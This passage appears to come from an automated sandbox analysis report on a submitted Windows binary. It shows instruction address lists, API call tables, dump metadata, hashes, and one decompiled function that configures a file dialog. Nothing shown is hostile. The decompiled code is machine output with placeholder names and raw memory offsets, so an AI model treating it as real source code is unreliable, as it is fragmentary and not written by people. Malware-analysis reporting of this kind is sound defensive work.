                  0x0042f04c
                  0x0042f05b
                  0x0042f062
                  0x0042f06a
                  0x0042f06c
                  0x0042f06e
                  0x0042f071
                  0x0042f074
                  0x0042f077
                  0x0042f0cb
                  0x0042f0cb
                  0x0042f0ce
                  0x0042f200
                  0x0042f179
                  0x0042f17d
                  0x0042f182
                  0x0042f187
                  0x0042f189
                  0x0042f18b
                  0x0042f18e
                  0x0042f19a
                  0x0042f19a
                  0x0042f18e
                  0x0042f1a3
                  0x0042f1a9
                  0x0042f1ac
                  0x0042f1af
                  0x0042f1bc
                  0x0042f1bf
                  0x0042f1c4
                  0x0042f1c4
                  0x0042f1cc
                  0x0042f1cd
                  0x0042f1d0
                  0x0042f1d0
                  0x0042f1d2
                  0x0042f1d2
                  0x0042f1d6
                  0x0042f1dc
                  0x0042f1e0
                  0x0042f1e6
                  0x0042f1e9
                  0x0042f1ee
                  0x0042f1e0
                  0x00000000
                  0x0042f1d6
                  0x0042f0d9
                  0x0042f0e3
                  0x0042f0e3
                  0x0042f0e5
                  0x0042f0e8
                  0x0042f0f2
                  0x0042f0f8
                  0x0042f0fb
                  0x0042f0fd
                  0x0042f0fd
                  0x0042f100
                  0x0042f100
                  0x0042f118
                  0x0042f11e
                  0x0042f125
                  0x0042f133
                  0x0042f13e
                  0x0042f144
                  0x0042f147
                  0x0042f14a
                  0x0042f15d
                  0x0042f15d
                  0x0042f170
                  0x00000000
                  0x0042f127
                  0x0042f12a
                  0x0042f12f
                  0x0042f131
                  0x0042f176
                  0x0042f176
                  0x00000000
                  0x0042f176
                  0x00000000
                  0x0042f131
                  0x0042f125
                  0x0042f079
                  0x0042f07c
                  0x00000000
                  0x00000000
                  0x0042f07e
                  0x0042f085
                  0x0042f0b4
                  0x0042f0b7
                  0x0042f0c1
                  0x0042f0c1
                  0x0042f087
                  0x0042f08b
                  0x0042f0a9
                  0x0042f0a9
                  0x00000000
                  0x0042efe8
                  0x0042efee
                  0x00000000
                  0x0042efee
                  0x0042efe6
                  0x0042ef91
                  0x0042ef96
                  0x0042ef99
                  0x0042ef9f
                  0x0042efa8
                  0x0042efab
                  0x0042efab
                  0x0042efad
                  0x0042efad
                  0x0042efb0
                  0x0042efb2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042ef6a
                  0x0042ef6c
                  0x0042ef72
                  0x0042ef75
                  0x0042ef75
                  0x00000000
                  0x0042ef6c
                  0x0042ef68
                  0x0042ef36
                  0x0042f20e
                  0x0042f20e
                  0x0042f20e
                  0x0042f215
                  0x0042f2dc
                  0x0042f2e1
                  0x0042f2e1
                  0x0042f21b
                  0x0042f236
                  0x0042f236
                  0x0042f23b
                  0x0042f23d
                  0x00000000
                  0x00000000
                  0x0042f21f
                  0x0042f221
                  0x0042f247
                  0x0042f247
                  0x0042f24d
                  0x0042f257
                  0x0042f25d
                  0x0042f260
                  0x0042f267
                  0x0042f267
                  0x0042f269
                  0x0042f269
                  0x0042f270
                  0x00000000
                  0x00000000
                  0x0042f272
                  0x0042f274
                  0x0042f2d6
                  0x0042f2d7
                  0x00000000
                  0x0042f2d7
                  0x0042f276
                  0x0042f27c
                  0x00000000
                  0x00000000
                  0x0042f27e
                  0x0042f284
                  0x00000000
                  0x00000000
                  0x0042f286
                  0x0042f28c
                  0x00000000
                  0x00000000
                  0x0042f28e
                  0x0042f294
                  0x00000000
                  0x00000000
                  0x0042f296
                  0x0042f29c
                  0x00000000
                  0x00000000
                  0x0042f29e
                  0x0042f2a4
                  0x00000000
                  0x00000000
                  0x0042f2a6
                  0x0042f2ac
                  0x00000000
                  0x00000000
                  0x0042f2ae
                  0x0042f2b4
                  0x00000000
                  0x00000000
                  0x0042f2b6
                  0x0042f2bc
                  0x00000000
                  0x00000000
                  0x0042f2be
                  0x0042f2c4
                  0x00000000
                  0x00000000
                  0x0042f2c6
                  0x0042f2cc
                  0x00000000
                  0x00000000
                  0x0042f2ce
                  0x0042f2d4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042f2d4
                  0x0042f262
                  0x0042f264
                  0x00000000
                  0x0042f264
                  0x0042f24f
                  0x0042f255
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042f255
                  0x0042f223
                  0x0042f22a
                  0x00000000
                  0x00000000
                  0x0042f235
                  0x0042f235
                  0x0042f23f
                  0x0042f241
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042f241

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042EED0
                  • GetKeyState.USER32(00000001), ref: 0042EF17
                  • GetKeyState.USER32(00000002), ref: 0042EF24
                  • GetKeyState.USER32(00000004), ref: 0042EF31
                  • GetParent.USER32(?), ref: 0042EF56
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F002
                  • _memset.LIBCMT ref: 0042F019
                  • ScreenToClient.USER32 ref: 0042F037
                  • _memset.LIBCMT ref: 0042F045
                  • GetCursorPos.USER32(?), ref: 0042F08B
                  • SendMessageA.USER32(?,00000412,00000000,?), ref: 0042F0A9
                  • SendMessageA.USER32(?,00000404,00000000,?), ref: 0042F118
                  • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 0042F13E
                  • SendMessageA.USER32(?,00000411,00000001,?), ref: 0042F15D
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042F170
                  • SendMessageA.USER32(?,00000405,00000000,?), ref: 0042F19A
                  • _memset.LIBCMT ref: 0042F1BF
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F200
                  • GetParent.USER32(?), ref: 0042F22F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                  • String ID: ,
                  • API String ID: 2864161637-3772416878
                  • Opcode ID: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction ID: 12e6ef49b556adbd16c397df292db5107c7fbfc968b24c64fcc66a0911b4c434
                  • Opcode Fuzzy Hash: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction Fuzzy Hash: 74C1C175B00225DFDF209F65D889BAE7B71BB05300FC1007BEA05E62E1D7799845CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042B39D, Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 443libraryloaderCOMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0042B39D(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t280;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				intOrPtr _t285;
				struct HINSTANCE__** _t288;
				intOrPtr _t292;
				signed int _t300;
				signed int _t303;
				signed int _t315;
				signed int _t325;
				intOrPtr _t329;
				signed int* _t330;
				signed int _t347;
				signed int _t349;
				signed int _t358;
				signed int _t363;
				signed int _t368;
				intOrPtr _t386;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				signed int _t448;
				char* _t449;
				void* _t450;
				void* _t451;
				void* _t452;
				void* _t456;
				void* _t460;
				signed int _t469;
				void* _t472;
				void* _t477;
				void* _t484;
				void* _t498;

				_t436 = __edx;
				_push(0x18);
				_t278 = E00431A9B(E0044C797, __ebx, __edi, __esi);
				_t443 = __ecx;
				 *(_t451 - 0x24) = __ecx;
				_t368 = 1;
				if( *((intOrPtr*)(__ecx + 0x78)) == 1) {
					_t280 =  *((intOrPtr*)(__ecx + 0x74));
					_t448 = 0;
					_t455 =  *((intOrPtr*)(_t280 + 0x30));
					if( *((intOrPtr*)(_t280 + 0x30)) != 0) {
						E004062EA(1, _t451 - 0x1c, __ecx, 0, _t455);
						_t363 =  *(_t443 + 0x80);
						 *(_t451 - 4) = 0;
						_t456 =  *((intOrPtr*)( *_t363 + 0x44))(_t363,  *(_t451 - 0x1c),  *((intOrPtr*)(_t280 + 0x30)));
						_t372 = 0 | _t456 < 0x00000000;
						_t457 = _t456 < 0;
						if(_t456 < 0) {
							L3:
							E00406436(_t368, _t372, _t443, _t448, _t457);
						}
						 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
						E004010B0( *(_t451 - 0x1c) + 0xfffffff0, _t436);
					}
					_t281 =  *((intOrPtr*)(_t443 + 0x74));
					_t459 =  *((intOrPtr*)(_t281 + 0x3c)) - _t448;
					if( *((intOrPtr*)(_t281 + 0x3c)) != _t448) {
						E004062EA(_t368, _t451 - 0x1c, _t443, _t448, _t459);
						_t358 =  *(_t443 + 0x80);
						 *(_t451 - 4) = _t368;
						_t460 =  *((intOrPtr*)( *_t358 + 0x58))(_t358,  *(_t451 - 0x1c),  *((intOrPtr*)(_t281 + 0x3c))) - _t448;
						_t372 = 0 | _t460 >= 0x00000000;
						if(_t460 >= 0 == _t448) {
							goto L3;
						} else {
							 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
							E004010B0( *(_t451 - 0x1c) + 0xfffffff0, _t436);
						}
					}
					_t282 =  *((intOrPtr*)(_t443 + 0x74));
					if( *((intOrPtr*)(_t282 + 0xc)) != _t448) {
						_t449 =  *((intOrPtr*)(_t282 + 0xc));
						_t368 = 0;
						if( *_t449 != 0) {
							do {
								_t450 = _t449 + E00431A10(_t449) + 1;
								_t449 = _t450 + E00431A10(_t450) + 1;
								_t368 = _t368 + 1;
							} while ( *_t449 != 0);
							 *(_t451 - 0x1c) = _t368;
							_t466 = _t368;
							if(_t368 > 0) {
								_t438 = 8;
								_t436 = _t368 * _t438 >> 0x20;
								_t448 = E00404461(_t466,  ~(0 | _t466 > 0x00000000) | _t368 * _t438);
								_pop(_t381);
								_t467 = _t448;
								if(_t448 == 0) {
									L13:
									E004063FE(_t368, _t381, _t443, _t448, _t467);
								}
								 *(_t451 - 0x18) =  *(_t451 - 0x18) & 0x00000000;
								_t468 =  *(_t451 - 0x1c);
								_t368 =  *( *((intOrPtr*)(_t443 + 0x74)) + 0xc);
								if( *(_t451 - 0x1c) > 0) {
									while(1) {
										E00405C38(_t451 - 0x14);
										 *(_t451 - 4) = 2;
										_t445 = E00431A10(_t368) + 1;
										_t439 = 2;
										_t436 = _t445 * _t439 >> 0x20;
										 *(_t451 - 0x20) = _t445;
										_t443 = E00404461(_t468,  ~(0 | _t468 > 0x00000000) | _t445 * _t439);
										_pop(_t381);
										_t469 = _t443;
										if(_t469 == 0) {
											goto L13;
										}
										E00405F3D(_t451 - 0x14, _t368);
										E0043065F(_t368,  *(_t451 - 0x14), _t443,  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2,  *(_t451 - 0x14),  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2);
										_t368 = _t368 +  *(_t451 - 0x20);
										 *(_t448 +  *(_t451 - 0x18) * 8) = _t443;
										_t443 = E00431A10(_t368) + 1;
										_t441 = 2;
										_t347 = _t443;
										_t436 = _t347 * _t441 >> 0x20;
										_t381 =  ~(_t469 > 0) | _t347 * _t441;
										_t349 = E00404461(_t469,  ~(_t469 > 0) | _t347 * _t441);
										_t452 = _t452 + 0x18;
										 *(_t451 - 0x20) = _t349;
										if(_t349 == 0) {
											goto L13;
										} else {
											E00405F3D(_t451 - 0x14, _t368);
											_t436 =  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2;
											E0043065F(_t368,  *(_t451 - 0x14),  *(_t451 - 0x20),  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2,  *(_t451 - 0x14),  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2);
											 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
											 *(_t448 + 4 +  *(_t451 - 0x18) * 8) =  *(_t451 - 0x20);
											_t452 = _t452 + 0x10;
											_t368 = _t368 + _t443;
											 *(_t451 - 0x18) =  *(_t451 - 0x18) + 1;
											E004010B0( *(_t451 - 0x14) + 0xfffffff0,  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2);
											if( *(_t451 - 0x18) <  *(_t451 - 0x1c)) {
												continue;
											} else {
												_t443 =  *(_t451 - 0x24);
											}
										}
										goto L19;
									}
									goto L13;
								}
								L19:
								_t325 =  *(_t443 + 0x80);
								_t472 =  *((intOrPtr*)( *_t325 + 0x10))(_t325,  *(_t451 - 0x1c), _t448);
								_t372 = 0 | _t472 >= 0x00000000;
								_t368 = 0;
								if(_t472 >= 0) {
									goto L3;
								} else {
									_t474 =  *(_t451 - 0x1c);
									if( *(_t451 - 0x1c) > 0) {
										do {
											E00404490(_t368, _t443, _t448, _t474,  *((intOrPtr*)(_t448 + _t368 * 8)));
											E00404490(_t368, _t443, _t448, _t474,  *((intOrPtr*)(_t448 + 4 + _t368 * 8)));
											_t368 = _t368 + 1;
											_t475 = _t368 -  *(_t451 - 0x1c);
										} while (_t368 <  *(_t451 - 0x1c));
									}
									E00404490(_t368, _t443, _t448, _t475, _t448);
									_t329 =  *((intOrPtr*)(_t443 + 0x74));
									_t386 = 1;
									if( *((intOrPtr*)(_t329 + 0x18)) > 1) {
										_t386 =  *((intOrPtr*)(_t329 + 0x18));
									}
									_t330 =  *(_t443 + 0x80);
									_t436 =  *_t330;
									_t477 =  *((intOrPtr*)( *_t330 + 0x14))(_t330, _t386);
									_t372 = 0 | _t477 >= 0x00000000;
									if(_t477 >= 0) {
										goto L3;
									}
								}
							}
						}
					}
					_t283 =  *((intOrPtr*)(_t443 + 0x74));
					_t448 = 0;
					if( *((intOrPtr*)(_t283 + 0x1c)) != 0 ||  *((intOrPtr*)(_t283 + 0x2c)) != 0) {
						_t370 = _t451 - 0x14;
						E00405C38(_t451 - 0x14);
						_t285 =  *((intOrPtr*)(_t443 + 0x74));
						 *(_t451 - 4) = 3;
						_t481 =  *((intOrPtr*)(_t285 + 0x1c)) - _t448;
						if( *((intOrPtr*)(_t285 + 0x1c)) == _t448) {
							_t368 =  *(_t451 - 0x14);
							goto L33;
						} else {
							_push( *((intOrPtr*)(_t285 + 0x1c)));
							E004062EA(_t368, _t451 - 0x1c, _t443, _t448, _t481);
							 *(_t451 - 4) = 4;
							E004149EC(_t451 - 0x14, _t451 - 0x1c);
							PathRemoveFileSpecW(E0042B001(_t451 - 0x14));
							E0041FF66(_t451 - 0x14, 0xffffffff);
							_t368 =  *(_t451 - 0x14);
							_t448 =  *(_t368 - 0xc);
							if(E0042AF3D(_t368, _t451 - 0x1c, _t443, _t448, _t448) == 0x5c) {
								_t448 = _t448 + 1;
							}
							_t437 =  *(_t451 - 0x1c);
							_t315 =  *(_t443 + 0x80);
							_t436 = _t437 + _t448 * 2;
							_t484 =  *((intOrPtr*)( *_t315 + 0x3c))(_t315, _t437 + _t448 * 2);
							_t372 = 0 | _t484 >= 0x00000000;
							if(_t484 >= 0) {
								goto L3;
							} else {
								_t370 =  *(_t451 - 0x1c) + 0xfffffff0;
								 *(_t451 - 4) = 3;
								E004010B0( *(_t451 - 0x1c) + 0xfffffff0, _t436);
								_t448 = 0;
								L33:
								_t286 =  *((intOrPtr*)(_t443 + 0x74));
								if( *((intOrPtr*)( *((intOrPtr*)(_t443 + 0x74)) + 0x2c)) == _t448) {
									L36:
									if( *(_t368 - 0xc) == _t448) {
										goto L46;
									} else {
										goto L37;
									}
								} else {
									if( *(_t368 - 0xc) != _t448) {
										L37:
										 *(_t451 - 0x18) = _t448;
										if(( *0x466938 & 0x00000001) == 0) {
											 *0x466938 =  *0x466938 | 0x00000001;
											_push("Shell32.dll");
											 *(_t451 - 4) = 5;
											 *0x466934 = E0040D5D6(_t368, _t370, _t443, _t448,  *0x466938);
											 *(_t451 - 4) = 3;
										}
										_t372 =  *0x466934; // 0x0
										if((0 | _t372 != _t448) == _t448) {
											goto L3;
										} else {
											if(( *0x466938 & 0x00000002) == 0) {
												 *0x466938 =  *0x466938 | 0x00000002;
												 *0x466930 = GetProcAddress(_t372, "SHCreateItemFromParsingName");
											}
											_t372 =  *0x466930; // 0x0
											if((0 | _t372 != _t448) == _t448) {
												goto L3;
											} else {
												_push(_t451 - 0x18);
												_push(0x454984);
												_push(_t448);
												_push(_t368);
												if(_t372->i() < _t448) {
													L46:
													 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
													E004010B0(_t368 - 0x10, _t436);
												} else {
													_t300 =  *(_t443 + 0x80);
													_t498 =  *((intOrPtr*)( *_t300 + 0x30))(_t300,  *(_t451 - 0x18)) - _t448;
													_t372 = 0 | _t498 >= 0x00000000;
													if(_t498 >= 0 == _t448) {
														goto L3;
													} else {
														_t303 =  *(_t451 - 0x18);
														 *((intOrPtr*)( *_t303 + 8))(_t303);
														goto L46;
													}
												}
											}
										}
									} else {
										_t370 = _t451 - 0x14;
										E00405F3D(_t451 - 0x14,  *((intOrPtr*)(_t286 + 0x2c)));
										_t368 =  *(_t451 - 0x14);
										goto L36;
									}
								}
							}
						}
					}
					_t288 =  *(_t443 + 0x80);
					_t436 = _t451 - 0x10;
					_push(_t451 - 0x10);
					 *(_t451 - 0x10) = _t448;
					_t372 =  *_t288;
					_push(_t288);
					if( *((intOrPtr*)( *_t288 + 0x28))() < 0) {
						goto L3;
					}
					_t292 =  *((intOrPtr*)(_t443 + 0x74));
					if(( *(_t292 + 0x34) & 0x00000200) == 0) {
						_t181 = _t451 - 0x10;
						 *_t181 =  *(_t451 - 0x10) & 0xfffffdff;
						__eflags =  *_t181;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000200;
					}
					if(( *(_t292 + 0x34) & 0x00002000) == 0) {
						_t188 = _t451 - 0x10;
						 *_t188 =  *(_t451 - 0x10) & 0xffffdfff;
						__eflags =  *_t188;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00002000;
					}
					if(( *(_t292 + 0x34) & 0x02000000) == 0) {
						_t195 = _t451 - 0x10;
						 *_t195 =  *(_t451 - 0x10) & 0xfdffffff;
						__eflags =  *_t195;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x02000000;
					}
					if(( *(_t292 + 0x34) & 0x00001000) == 0) {
						_t202 = _t451 - 0x10;
						 *_t202 =  *(_t451 - 0x10) & 0xffffefff;
						__eflags =  *_t202;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00001000;
					}
					if(( *(_t292 + 0x34) & 0x10000000) == 0) {
						_t209 = _t451 - 0x10;
						 *_t209 =  *(_t451 - 0x10) & 0xefffffff;
						__eflags =  *_t209;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x10000000;
					}
					if(( *(_t292 + 0x34) & 0x00000008) == 0) {
						_t216 = _t451 - 0x10;
						 *_t216 =  *(_t451 - 0x10) & 0xfffffff7;
						__eflags =  *_t216;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000008;
					}
					if(( *(_t292 + 0x34) & 0x00100000) == 0) {
						_t223 = _t451 - 0x10;
						 *_t223 =  *(_t451 - 0x10) & 0xffefffff;
						__eflags =  *_t223;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00100000;
					}
					if(( *(_t292 + 0x34) & 0x00008000) == 0) {
						_t230 = _t451 - 0x10;
						 *_t230 =  *(_t451 - 0x10) & 0xffff7fff;
						__eflags =  *_t230;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00008000;
					}
					if(( *(_t292 + 0x34) & 0x00010000) == 0) {
						_t237 = _t451 - 0x10;
						 *_t237 =  *(_t451 - 0x10) & 0xfffeffff;
						__eflags =  *_t237;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00010000;
					}
					if(( *(_t292 + 0x34) & 0x00000100) == 0) {
						_t244 = _t451 - 0x10;
						 *_t244 =  *(_t451 - 0x10) & 0xfffffeff;
						__eflags =  *_t244;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000100;
					}
					if(( *(_t292 + 0x34) & 0x00000002) == 0) {
						_t251 = _t451 - 0x10;
						 *_t251 =  *(_t451 - 0x10) & 0xfffffffd;
						__eflags =  *_t251;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000002;
					}
					if(( *(_t292 + 0x34) & 0x00000800) == 0) {
						_t258 = _t451 - 0x10;
						 *_t258 =  *(_t451 - 0x10) & 0xfffff7ff;
						__eflags =  *_t258;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000800;
					}
					_t372 = 0x4000;
					if(( *(_t292 + 0x34) & 0x00004000) == 0) {
						_t265 = _t451 - 0x10;
						 *_t265 =  *(_t451 - 0x10) & 0xffffbfff;
						__eflags =  *_t265;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00004000;
					}
					if(( *(_t292 + 0x54) & 0x00000001) == 0) {
						_t272 = _t451 - 0x10;
						 *_t272 =  *(_t451 - 0x10) & 0xfffbffff;
						__eflags =  *_t272;
					} else {
						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00040000;
					}
					_t443 =  *(_t443 + 0x80);
					_push( *(_t451 - 0x10));
					_push(_t443);
					if( *((intOrPtr*)( *_t443 + 0x24))() < 0) {
						goto L3;
					}
				}
				return E00431B73(_t278);
			}








































                  0x0042b39d
                  0x0042b39d
                  0x0042b3a4
                  0x0042b3a9
                  0x0042b3ab
                  0x0042b3b0
                  0x0042b3b4
                  0x0042b3ba
                  0x0042b3bd
                  0x0042b3bf
                  0x0042b3c2
                  0x0042b3ca
                  0x0042b3cf
                  0x0042b3db
                  0x0042b3e3
                  0x0042b3e5
                  0x0042b3ea
                  0x0042b3ec
                  0x0042b3ee
                  0x0042b3ee
                  0x0042b3ee
                  0x0042b3f6
                  0x0042b3fd
                  0x0042b3fd
                  0x0042b402
                  0x0042b405
                  0x0042b408
                  0x0042b410
                  0x0042b415
                  0x0042b421
                  0x0042b429
                  0x0042b42b
                  0x0042b432
                  0x00000000
                  0x0042b434
                  0x0042b437
                  0x0042b43e
                  0x0042b43e
                  0x0042b432
                  0x0042b443
                  0x0042b449
                  0x0042b44f
                  0x0042b452
                  0x0042b456
                  0x0042b45c
                  0x0042b462
                  0x0042b46c
                  0x0042b471
                  0x0042b475
                  0x0042b478
                  0x0042b47b
                  0x0042b47d
                  0x0042b487
                  0x0042b48a
                  0x0042b499
                  0x0042b49b
                  0x0042b49c
                  0x0042b49e
                  0x0042b4a0
                  0x0042b4a0
                  0x0042b4a0
                  0x0042b4a8
                  0x0042b4ac
                  0x0042b4b0
                  0x0042b4b3
                  0x0042b4b9
                  0x0042b4bc
                  0x0042b4c2
                  0x0042b4d0
                  0x0042b4d5
                  0x0042b4d8
                  0x0042b4dd
                  0x0042b4ea
                  0x0042b4ed
                  0x0042b4ee
                  0x0042b4f0
                  0x00000000
                  0x00000000
                  0x0042b4f6
                  0x0042b50d
                  0x0042b512
                  0x0042b519
                  0x0042b523
                  0x0042b528
                  0x0042b529
                  0x0042b52b
                  0x0042b532
                  0x0042b535
                  0x0042b53a
                  0x0042b53d
                  0x0042b542
                  0x00000000
                  0x0042b548
                  0x0042b54c
                  0x0042b557
                  0x0042b565
                  0x0042b570
                  0x0042b574
                  0x0042b57b
                  0x0042b57e
                  0x0042b580
                  0x0042b586
                  0x0042b591
                  0x00000000
                  0x0042b597
                  0x0042b597
                  0x0042b597
                  0x0042b591
                  0x00000000
                  0x0042b542
                  0x00000000
                  0x0042b4b9
                  0x0042b59a
                  0x0042b59a
                  0x0042b5ac
                  0x0042b5ae
                  0x0042b5b1
                  0x0042b5b7
                  0x00000000
                  0x0042b5bd
                  0x0042b5bd
                  0x0042b5c0
                  0x0042b5c2
                  0x0042b5c5
                  0x0042b5ce
                  0x0042b5d3
                  0x0042b5d6
                  0x0042b5d6
                  0x0042b5c2
                  0x0042b5dc
                  0x0042b5e1
                  0x0042b5e7
                  0x0042b5eb
                  0x0042b5ed
                  0x0042b5ed
                  0x0042b5f0
                  0x0042b5f6
                  0x0042b5ff
                  0x0042b601
                  0x0042b608
                  0x00000000
                  0x00000000
                  0x0042b608
                  0x0042b5b7
                  0x0042b47d
                  0x0042b456
                  0x0042b60e
                  0x0042b611
                  0x0042b616
                  0x0042b621
                  0x0042b624
                  0x0042b629
                  0x0042b62c
                  0x0042b633
                  0x0042b636
                  0x0042b6bd
                  0x00000000
                  0x0042b63c
                  0x0042b63c
                  0x0042b642
                  0x0042b64e
                  0x0042b652
                  0x0042b660
                  0x0042b66b
                  0x0042b670
                  0x0042b673
                  0x0042b683
                  0x0042b685
                  0x0042b685
                  0x0042b686
                  0x0042b689
                  0x0042b691
                  0x0042b69b
                  0x0042b69d
                  0x0042b6a4
                  0x00000000
                  0x0042b6aa
                  0x0042b6ad
                  0x0042b6b0
                  0x0042b6b4
                  0x0042b6b9
                  0x0042b6c0
                  0x0042b6c0
                  0x0042b6c6
                  0x0042b6db
                  0x0042b6de
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042b6c8
                  0x0042b6cb
                  0x0042b6e4
                  0x0042b6eb
                  0x0042b6ee
                  0x0042b6f0
                  0x0042b6f7
                  0x0042b6fc
                  0x0042b706
                  0x0042b70b
                  0x0042b70b
                  0x0042b70f
                  0x0042b71e
                  0x00000000
                  0x0042b724
                  0x0042b72b
                  0x0042b72d
                  0x0042b740
                  0x0042b740
                  0x0042b745
                  0x0042b754
                  0x00000000
                  0x0042b75a
                  0x0042b75d
                  0x0042b75e
                  0x0042b763
                  0x0042b764
                  0x0042b769
                  0x0042b794
                  0x0042b794
                  0x0042b79b
                  0x0042b76b
                  0x0042b76b
                  0x0042b77c
                  0x0042b77e
                  0x0042b785
                  0x00000000
                  0x0042b78b
                  0x0042b78b
                  0x0042b791
                  0x00000000
                  0x0042b791
                  0x0042b785
                  0x0042b769
                  0x0042b754
                  0x0042b6cd
                  0x0042b6d0
                  0x0042b6d3
                  0x0042b6d8
                  0x00000000
                  0x0042b6d8
                  0x0042b6cb
                  0x0042b6c6
                  0x0042b6a4
                  0x0042b636
                  0x0042b7a0
                  0x0042b7a6
                  0x0042b7a9
                  0x0042b7aa
                  0x0042b7ad
                  0x0042b7af
                  0x0042b7b5
                  0x00000000
                  0x00000000
                  0x0042b7bb
                  0x0042b7c6
                  0x0042b7cd
                  0x0042b7cd
                  0x0042b7cd
                  0x0042b7c8
                  0x0042b7c8
                  0x0042b7c8
                  0x0042b7dc
                  0x0042b7e3
                  0x0042b7e3
                  0x0042b7e3
                  0x0042b7de
                  0x0042b7de
                  0x0042b7de
                  0x0042b7f2
                  0x0042b7f9
                  0x0042b7f9
                  0x0042b7f9
                  0x0042b7f4
                  0x0042b7f4
                  0x0042b7f4
                  0x0042b808
                  0x0042b80f
                  0x0042b80f
                  0x0042b80f
                  0x0042b80a
                  0x0042b80a
                  0x0042b80a
                  0x0042b81e
                  0x0042b825
                  0x0042b825
                  0x0042b825
                  0x0042b820
                  0x0042b820
                  0x0042b820
                  0x0042b830
                  0x0042b838
                  0x0042b838
                  0x0042b838
                  0x0042b832
                  0x0042b832
                  0x0042b832
                  0x0042b844
                  0x0042b84b
                  0x0042b84b
                  0x0042b84b
                  0x0042b846
                  0x0042b846
                  0x0042b846
                  0x0042b85a
                  0x0042b861
                  0x0042b861
                  0x0042b861
                  0x0042b85c
                  0x0042b85c
                  0x0042b85c
                  0x0042b870
                  0x0042b877
                  0x0042b877
                  0x0042b877
                  0x0042b872
                  0x0042b872
                  0x0042b872
                  0x0042b886
                  0x0042b88d
                  0x0042b88d
                  0x0042b88d
                  0x0042b888
                  0x0042b888
                  0x0042b888
                  0x0042b898
                  0x0042b8a0
                  0x0042b8a0
                  0x0042b8a0
                  0x0042b89a
                  0x0042b89a
                  0x0042b89a
                  0x0042b8ac
                  0x0042b8b3
                  0x0042b8b3
                  0x0042b8b3
                  0x0042b8ae
                  0x0042b8ae
                  0x0042b8ae
                  0x0042b8ba
                  0x0042b8c2
                  0x0042b8c9
                  0x0042b8c9
                  0x0042b8c9
                  0x0042b8c4
                  0x0042b8c4
                  0x0042b8c4
                  0x0042b8d4
                  0x0042b8df
                  0x0042b8df
                  0x0042b8df
                  0x0042b8d6
                  0x0042b8d6
                  0x0042b8d6
                  0x0042b8e6
                  0x0042b8ec
                  0x0042b8f1
                  0x0042b8f7
                  0x00000000
                  0x00000000
                  0x0042b8f7
                  0x0042b902

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042B3A4
                  • _strlen.LIBCMT ref: 0042B45D
                  • _strlen.LIBCMT ref: 0042B467
                  • _strlen.LIBCMT ref: 0042B4C9
                  • _memcpy_s.LIBCMT ref: 0042B50D
                    • Part of subcall function 004062EA: __EH_prolog3.LIBCMT ref: 004062F1
                  • _strlen.LIBCMT ref: 0042B51C
